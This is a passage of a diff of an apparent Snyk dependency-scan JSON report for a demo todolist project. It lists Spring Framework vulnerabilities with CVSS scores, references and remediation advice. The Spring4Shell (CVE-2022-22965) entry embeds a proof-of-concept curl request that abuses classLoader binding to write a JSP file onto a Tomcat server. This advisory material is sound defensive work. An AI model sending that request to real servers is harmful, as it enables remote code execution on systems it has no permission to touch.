"groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2022-03-29T14:24:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.044801Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Google OSS-Fuzz team" - ], - "semver": { - "vulnerable": [ - "[,5.2.23.RELEASE)", - "[5.3.0,5.3.26)", - "[6.0.0,6.0.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.23.RELEASE", - "5.3.26", - "6.0.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20861", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:22.626014Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:04.052825Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.291695Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", - "epssDetails": { - "percentile": "0.48906", - "probability": "0.00133", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20861" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-03-23T12:26:39.837900Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-03-23T11:49:46Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2023-03-23T12:37:13.052190Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.291695Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Google OSS-Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,5.2.24.RELEASE)", - "[5.3.0,5.3.27)", - "[6.0.0,6.0.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.24.RELEASE", - "5.3.27", - "6.0.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", - "title": "GitHub Commit" - }, - { - "url": "https://spring.io/security/cve-2023-20863", - "title": "Vulnerability Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:15.433654Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:09.820460Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", - "epssDetails": { - "percentile": "0.70100", - "probability": "0.00306", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-20863" - ], - "CWE": [ - "CWE-770" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2023-04-14T06:33:20.884492Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-04-14T06:25:45Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-expression" - }, - "publicationTime": "2023-04-14T06:33:21.063044Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:09.820460Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-expression", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", - "title": "Remote Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ] - }, - "exploit": "High", - "fixedIn": [ - "5.2.20", - "5.3.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "filePath": "org/springframework/beans/CachedIntrospectionResults.java", - "className": "CachedIntrospectionResults", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", - "title": "CyberKendra Post" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", - "title": "GitHub Commit" - }, - { - "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", - "title": "LunaSec Blog" - }, - { - "url": "https://blog.payara.fish/payara-and-spring4shell", - "title": "Payara Blogpost" - }, - { - "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", - "title": "Payara PoC" - }, - { - "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", - "title": "Snyk Blog - Technical Breakdown" - }, - { - "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", - "title": "Snyk PoC" - }, - { - "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", - "title": "Spring Security Announcement" - }, - { - "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", - "title": "Spring Tomcat Mitigation Advice" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-30T15:25:03.231650Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.628867Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:15.463472Z" - } - ], - "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). \r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", - "epssDetails": { - "percentile": "0.99975", - "probability": "0.97485", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22965" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-03-30T21:42:31.436000Z", - "functions_new": [ - { - "version": [ - "[ ,5.2.20)", - "[5.3.0, 5.3.18)" - ], - "functionId": { - "className": "org.springframework.beans.CachedIntrospectionResults", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2022-03-30T21:42:24Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-03-30T22:32:44Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:17.474380Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Rob Ryan" - ], - "semver": { - "vulnerable": [ - "[,5.2.22.RELEASE)", - "[5.3.0,5.3.20)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.22.RELEASE", - "5.3.20" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-beans", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", - "title": "GitHub Commit" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22970", - "title": "Tanzu vmware" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:21.626910Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:28.086179Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:48.407397Z" - } - ], - "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", - "epssDetails": { - "percentile": "0.75300", - "probability": "0.00449", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22970" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-05-12T08:45:35.744127Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-05-12T08:17:10Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-05-12T09:49:10.833602Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:48.407397Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", - "title": "Improper Handling of Case Sensitivity", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.2.21)", - "[5.3.0, 5.3.19)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "5.2.21", - "5.3.19" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "low", - "cvssScore": 3.7, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-context", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28333", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/MarcinGadz/spring-rce-poc", - "title": "PoC" - }, - { - "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", - "title": "Spring Blog Post" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22968", - "title": "Tanzu Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:26.822810Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "assigner": "Snyk", - "severity": "low", - "baseScore": 3.7, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:31.233852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:26.822810Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", - "epssDetails": { - "percentile": "0.29205", - "probability": "0.00065", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22968" - ], - "CWE": [ - "CWE-178" - ] - }, - "packageName": "org.springframework:spring-context", - "proprietary": false, - "creationTime": "2022-04-14T11:54:10.207823Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-04-14T11:43:54Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-context" - }, - "publicationTime": "2022-04-14T12:09:40Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:16.458425Z", - "socialTrendAlert": false, - "severityWithCritical": "low", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-context", - "version": "3.2.6.RELEASE" - }, - { - "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.5.4,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.aspectj:aspectjweaver", - "creationTime": "2024-06-18T21:24:04.112Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T21:24:04.112Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.aspectj:aspectjweaver@1.8.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.aspectj:aspectjweaver", - "version": "1.8.2" - }, - { - "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[4.0.0.CR1,)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.hibernate.common:hibernate-commons-annotations", - "creationTime": "2024-06-18T11:03:46.980Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:03:46.980Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate.common:hibernate-commons-annotations", - "version": "4.0.5.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.0.0.Final,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "creationTime": "2024-06-18T12:03:42.953Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T12:03:42.953Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ 